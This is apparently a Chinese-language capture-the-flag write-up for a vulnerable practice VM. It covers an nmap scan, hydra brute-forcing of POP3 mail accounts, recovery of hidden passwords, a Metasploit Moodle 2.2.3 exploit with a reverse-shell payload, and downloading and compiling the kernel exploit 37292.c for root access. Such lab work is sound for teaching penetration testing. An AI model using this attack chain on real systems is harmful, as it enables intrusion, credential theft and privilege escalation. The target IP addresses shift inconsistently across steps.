靶机下载地址:链接:https://pan.baidu.com/s/19pzREB1mh4afTpgqhi5Akg?pwd=qwv8 
提取码:qwv8 

kali与靶机都为NAT模式

查看kali的IP

ifconfig

nmap -P- 192.168.182.130/24

nmap -sS -sV -T5 -A 192.168.182.134

 看到开启了25端口,80端口

-T5  急速扫描,这种方式会牺牲准确度

另:-T0 非常慢的扫描

-T1 比较慢的扫描

-T2 降低速度以降低对带宽的消耗

-T3 默认,根据目标的反应自动调整时间

-T4 急速扫描,常用德扫描方式

查看25端口是什么作用

访问http服务,得到以下信息

提示我们到/sev-home/登录,但是我们没有账号密码

 查看页面源代码

 <script src="terminal.js"></script>

 获得用户名:Boris、Natalya
获得密码:&#73;&#110;&#118;&#105;&#110;&#99;&#105;&#98;&#108;&#101;&#72;&#97;&#99;&#107;&#51;&#114

密码是html编码

 

 我使用burp的Decoder模块进行解码,也可以用其他方式,得到密码:InvincibleHack3r

 来到/sev-home/登录

is very effective, we have configured our pop3 service to run on a very high non-default port
谷歌翻译:非常有效,我们已将 pop3 服务配置为在非常高的非默认端口上运行 

从上面的消息中,我们可以了解到某个非默认端口上正在运行一个活动的POP3服务,进行nmap全端口扫描:
nmap -p- 192.168.85.130 (-p-:全端口扫描   -p3306:仅仅扫描3306端口) 

 发现55006,55007两个端口

nmap -sS -sV -T5 -A -p55006,55007 192.168.182.134

这两个端口都开放了pop3和mail服务,既然有邮件服务,尝试是否可以爆破邮箱

echo -e 'natalya\nboris' > yc.txt  前面得到的用户名存到字典

 经过2~5分钟等待,获得两组账号密码:
用户:boris 密码:secret1!
用户:natalya 密码:bird

通过NC登录pop3查看邮件信封内容

nc 192.168.4.202 55007     ---登录邮箱
user boris                 ---登录用户
pass secret1!              ---登录密码
list                       ---查看邮件数量
retr 1~3                   ---查看邮件内容

retr1

 retr 2

 

 称可以破坏鲍里斯密码

retr 3

natalya用户登录邮件查看信息:
nc 192.168.4.202 55007     ---登录邮箱
user natalya               ---登录用户
pass bird                  ---登录密码
list                       ---查看邮件数量
retr 1~3                   ---查看邮件内容

retr 1

retr 2

 在第二封邮件看到了另外一个用户名密码,此服务器域名和网站,还要求我们在本地服务hosts中添加域名信息:
用户名:xenia
密码:  
域:severnaya-station.com
网址:severnaya-station.com/gnocertdir
我们现根据邮件提示添加本地域名:severnaya-station.com

第一步:设置本地HOSTS文件,hosts文件一般在/etc/hosts

 

 访问severnaya-station.com/gnocertdir,发现一个名字doak

 发现使用了开源cms --moudle和登录按钮

也可以进行指纹识别

whatweb severnaya-station.com/gnocertdir

 

使用邮件账号密码登录

登录后在message发现一封邮件

 

 查看邮件

没有找到有用信息,尝试对doak进行爆破

hydra -l doak -P /usr/share/wordlists/fasttrack.txt 192.168.182.134 -s 55007 pop3

 账号:doak    密码:goat

登录doak用户枚举邮件信息
nc 192.168.182.134 55007     ---登录邮箱
user doak                  ---登录用户
pass goat                  ---登录密码
list                       ---查看邮件数量
retr 1                     ---查看邮件内容

 

 username:dr_doak

password:   4England!

 访问severnaya-station.com/gnocertdir

登录后在:Home /  My home 右边发现: s3cret.txt,另外发现这是Moodle使用的2.2.3版本

打开文件

 

 

访问页面:severnaya-station.com/dir007key/for-007.jpg

 

 下载到本地:
wget http://severnaya-station.com/dir007key/for-007.jpg

根据邮件提示让我们检查图片内容,下载图片后,我们可以使用:
binwalk(路由逆向分析工具)
exiftool(图虫)
strings(识别动态库版本指令)
等查看jpg文件底层内容!

exiftool for-007.jpg
strings for-007.jpg


用以上命令都可以查看到base64编码隐藏信息:eFdpbnRlcjE5OTV4IQ==

base64解码 

 

解码得:xWinter1995x! 

线索中说,这是管理员用户的密码。管理员用户身份继续登陆应用程序。
用户名:admin
密码:xWinter1995x!
severnaya-station.com/gnocertdir

登录成功但是没有发现有用信息

根据moudle2.2.3找漏洞,使用msf

 info 1

发现2.2.3版本可以用

use 1

show options

set username admin                ---设置用户名:admin
set password xWinter1995x!        ---设置密码:xWinter1995x!
set rhost severnaya-station.com   ---设置:rhosts severnaya-station.com
set targeturi /gnocertdir         ---设置目录: /gnocertdir
set payload cmd/unix/reverse      ---设置payload:cmd/unix/reverse
set lhost 192.168.4.231           ---设置:lhost 192.168.4.231(需要本地IP)

 

run

发现无法建立连接,发现该邮箱的系统使用的google Spell,需要修改成powershell,里面是PSpellShell,然后save。重新返回msfconsole,run,就没问题了

 

内核提权

现是ubuntu3.13.0,然后利用浏览器搜索Linux ubuntu 3.13.0-32 exploit,

 

 searchsploit 37292        ---搜索kali本地的exp库中37292攻击脚本信息

searchsploit -p linux/local/37292.c

cp /usr/share/exploitdb/exploits/linux/local/37292.c /home/kali/Desktop 

  ---目录自行修改


 这个靶场在枚举信息知道:
无法进行GCC编译,需要改下脚本为cc

vim 37292.c

 桌面开启http服务 python3 -m http.server 8087

靶机下载

wget http://192.168.182.130:8087/37292.c

 成功下载后执行cc编译:
cc -o exp 37292.c     ---C语言的CC代码编译点c文件
chmod +x exp          ---编译成可执行文件,并赋权
./exp                 ---点杠执行

提权成功,成功获得root权限,然后查看根目录,寻找靶机的flag

这里如果cd /root后,利用ls命令,无法查看到flag文件,需要利用   ls -a  显示所有文件并且包括隐藏的文件,发现.flag.txt文件

 

 

 

 

 

 

 

 

 

 

 

 

 

更多推荐